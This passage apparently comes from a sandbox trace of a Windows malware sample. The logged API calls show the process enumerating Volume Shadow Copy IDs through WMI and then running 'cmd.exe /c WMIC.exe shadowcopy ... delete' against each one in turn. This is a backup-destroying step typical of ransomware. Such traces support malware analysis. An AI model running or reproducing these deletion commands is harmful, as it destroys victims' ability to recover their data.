pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0096.844] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 114 [0096.844] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0096.844] lstrcpyW (in: lpString1=0x18e054, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" [0096.844] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e00c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dffc | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete", lpProcessInformation=0x18dffc*(hProcess=0x234, hThread=0x230, dwProcessId=0x67c, dwThreadId=0x664)) returned 1 [0096.848] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0098.418] CloseHandle (hObject=0x230) returned 1 [0098.418] CloseHandle (hObject=0x234) returned 1 [0098.418] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0098.418] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0098.418] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0098.420] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{05121166-67F2-4EA9-83D8-EDC08F680DA7}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0098.421] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 114 [0098.421] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0098.421] lstrcpyW (in: lpString1=0x18e048, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" [0098.421] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e000*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dff0 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete", lpProcessInformation=0x18dff0*(hProcess=0x230, hThread=0x234, dwProcessId=0x644, dwThreadId=0xa90)) returned 1 [0098.428] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0099.961] CloseHandle (hObject=0x234) returned 1 [0099.961] CloseHandle (hObject=0x230) returned 1 [0099.961] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0099.962] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0099.962] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0099.964] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0099.964] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 114 [0099.964] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0099.964] lstrcpyW (in: lpString1=0x18e03c, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" [0099.964] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dff4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dfe4 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete", lpProcessInformation=0x18dfe4*(hProcess=0x234, hThread=0x230, dwProcessId=0x84c, dwThreadId=0x86c)) returned 1 [0099.972] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0101.548] CloseHandle (hObject=0x230) returned 1 [0101.548] CloseHandle (hObject=0x234) returned 1 [0101.548] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0101.548] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0101.548] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0101.549] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{7199C78C-6563-4398-B813-4A3F86995AEC}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0101.549] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 114 [0101.549] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0101.549] lstrcpyW (in: lpString1=0x18e030, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" [0101.549] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfe8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dfd8 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete", lpProcessInformation=0x18dfd8*(hProcess=0x230, hThread=0x234, dwProcessId=0xa20, dwThreadId=0xb40)) returned 1 [0101.556] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0103.405] CloseHandle (hObject=0x234) returned 1 [0103.405] CloseHandle (hObject=0x230) returned 1 [0103.405] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0103.405] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0103.405] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0103.406] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{0F63D180-8A8A-41CF-8B3E-2852647AB192}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0103.406] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 114 [0103.406] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0103.406] lstrcpyW (in: lpString1=0x18e024, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" [0103.407] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfdc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dfcc | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete", lpProcessInformation=0x18dfcc*(hProcess=0x234, hThread=0x230, dwProcessId=0x544, dwThreadId=0x408)) returned 1 [0103.424] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0105.166] CloseHandle (hObject=0x230) returned 1 [0105.166] CloseHandle (hObject=0x234) returned 1 [0105.166] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0105.166] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0105.166] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0105.167] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0105.167] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 114 [0105.167] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0105.168] lstrcpyW (in: lpString1=0x18e018, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" [0105.168] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfd0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dfc0 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete", lpProcessInformation=0x18dfc0*(hProcess=0x230, hThread=0x234, dwProcessId=0xb0c, dwThreadId=0x5b8)) returned 1 [0105.172] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0106.668] CloseHandle (hObject=0x234) returned 1 [0106.668] CloseHandle (hObject=0x230) returned 1 [0106.669] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0106.669] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0106.669] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0106.670] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0106.670] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 114 [0106.670] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0106.670] lstrcpyW (in: lpString1=0x18e00c, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" [0106.670] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfc4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dfb4 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete", lpProcessInformation=0x18dfb4*(hProcess=0x234, hThread=0x230, dwProcessId=0x270, dwThreadId=0x71c)) returned 1 [0106.677] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0108.410] CloseHandle (hObject=0x230) returned 1 [0108.410] CloseHandle (hObject=0x234) returned 1 [0108.410] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0108.410] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0108.410] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0108.412] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0108.412] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 114 [0108.412] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0108.412] lstrcpyW (in: lpString1=0x18e000, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" [0108.412] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dfa8 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete", lpProcessInformation=0x18dfa8*(hProcess=0x230, hThread=0x234, dwProcessId=0x87c, dwThreadId=0x664)) returned 1 [0108.420] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0111.407] CloseHandle (hObject=0x234) returned 1 [0111.407] CloseHandle (hObject=0x230) returned 1 [0111.407] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0111.407] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0111.407] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0111.408] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{1EE90775-4E53-4C29-811E-F4996057D94E}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0111.409] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 114 [0111.409] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0111.409] lstrcpyW (in: lpString1=0x18dff4, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" [0111.409] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df9c | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete", lpProcessInformation=0x18df9c*(hProcess=0x234, hThread=0x230, dwProcessId=0x8bc, dwThreadId=0xa98)) returned 1 [0111.415] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0113.354] CloseHandle (hObject=0x230) returned 1 [0113.354] CloseHandle (hObject=0x234) returned 1 [0113.354] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0113.354] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0113.354] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0113.355] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, 